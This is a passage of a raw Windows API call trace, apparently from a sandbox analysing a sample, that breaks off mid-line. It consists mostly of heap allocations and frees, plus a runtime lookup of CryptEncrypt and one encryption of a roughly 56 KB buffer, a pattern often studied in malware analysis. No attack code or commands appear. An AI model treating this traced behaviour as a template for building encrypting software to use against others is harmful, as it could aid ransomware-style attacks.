0x2e54f38 [0259.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0259.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0259.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0259.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0259.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0259.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0259.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0259.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0259.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0259.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0259.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0259.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0259.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0259.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0259.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0259.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0259.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0259.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0259.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0259.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0259.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0259.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0259.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0259.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0259.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0259.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0259.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0259.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0259.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0259.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0259.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0259.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0259.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0259.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0259.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0259.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0259.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0259.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977998 [0259.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0259.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0259.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0259.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0259.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0259.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0259.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0259.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0259.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0259.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0259.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0259.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0259.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0259.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xda0a) returned 0x2e7f320 [0259.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0259.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f320 | out: hHeap=0x970000) returned 1 [0259.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0259.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0259.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0259.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0259.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0259.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0259.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0259.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0259.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e565e8 [0259.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0259.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0259.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0259.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0259.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0259.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0259.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0259.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0259.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0259.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0259.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0259.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0259.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0259.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0259.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0259.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0259.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0259.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0259.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0259.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0259.288] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0259.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0259.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0259.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0259.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0259.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0259.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0259.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0259.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0259.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0259.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0259.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0259.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0259.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0259.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0259.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0259.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0259.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0259.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0259.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0259.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0259.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0259.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55158 [0259.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0259.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0259.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0259.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0259.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55158 | out: hHeap=0x970000) returned 1 [0259.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551a8 [0259.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0259.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551f8 [0259.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55178 [0259.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0259.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0259.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0259.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0259.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0259.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55278 [0259.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0259.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55178 [0259.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55248 [0259.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0259.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0259.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0259.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0259.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0259.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0259.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0259.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55178 [0259.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0259.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55138 [0259.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55198 [0259.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0259.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0259.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55138 | out: hHeap=0x970000) returned 1 [0259.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0259.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55198 | out: hHeap=0x970000) returned 1 [0259.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55268 [0259.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0259.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55248 [0259.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55288 [0259.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0259.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0259.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0259.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0259.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55288 | out: hHeap=0x970000) returned 1 [0259.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55288 [0259.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0259.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55298 [0259.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55218 [0259.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0259.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0259.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55298 | out: hHeap=0x970000) returned 1 [0259.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0259.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55218 | out: hHeap=0x970000) returned 1 [0259.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0259.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55158 [0259.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0259.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51da8 [0259.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51da8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0259.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0259.292] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0259.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0259.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55158 | out: hHeap=0x970000) returned 1 [0259.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e543a0 [0259.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551c8 [0259.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55168 [0259.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551d8 [0259.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551f8 [0259.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55298 [0259.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552e8 [0259.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552a8 [0259.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0259.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55168 | out: hHeap=0x970000) returned 1 [0259.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551d8 | out: hHeap=0x970000) returned 1 [0259.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0259.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55298 | out: hHeap=0x970000) returned 1 [0259.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552e8 | out: hHeap=0x970000) returned 1 [0259.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552a8 | out: hHeap=0x970000) returned 1 [0259.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0259.292] CryptEncrypt (in: hKey=0xa87390, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f3ce58*, pdwDataLen=0x8cef60*=0xda0a, dwBufLen=0xda10 | out: pbData=0x2f3ce58*, pdwDataLen=0x8cef60*=0xda10) returned 1 [0259.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0259.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0259.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55168 [0259.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0259.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0259.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0259.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55298 [0259.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0259.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55298 | out: hHeap=0x970000) returned 1 [0259.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0259.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0259.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0259.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0259.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551c8 [0259.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0259.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0259.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0259.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0259.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0259.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0259.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551f8 [0259.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0259.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0259.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0259.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0259.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0259.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0259.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55188 [0259.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0259.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55188 | out: hHeap=0x970000) returned 1 [0259.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0259.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0259.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0259.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0259.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55258 [0259.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0259.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55258 | out: hHeap=0x970000) returned 1 [0259.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0259.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0259.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0259.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0259.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552d8 [0259.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0259.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552d8 | out: hHeap=0x970000) returned 1 [0259.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0259.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0259.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0259.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0259.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552d8 [0259.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0259.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520c0 [0259.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ef8 [0259.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55258 [0259.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ef8 | out: hHeap=0x970000) returned 1 [0259.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55258 | out: hHeap=0x970000) returned 1 [0259.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520c0 | out: hHeap=0x970000) returned 1 [0259.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52078 [0259.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52120 [0259.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52000 [0259.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551c8 [0259.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52000 | out: hHeap=0x970000) returned 1 [0259.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0259.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52120 | out: hHeap=0x970000) returned 1 [0259.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0259.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0259.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 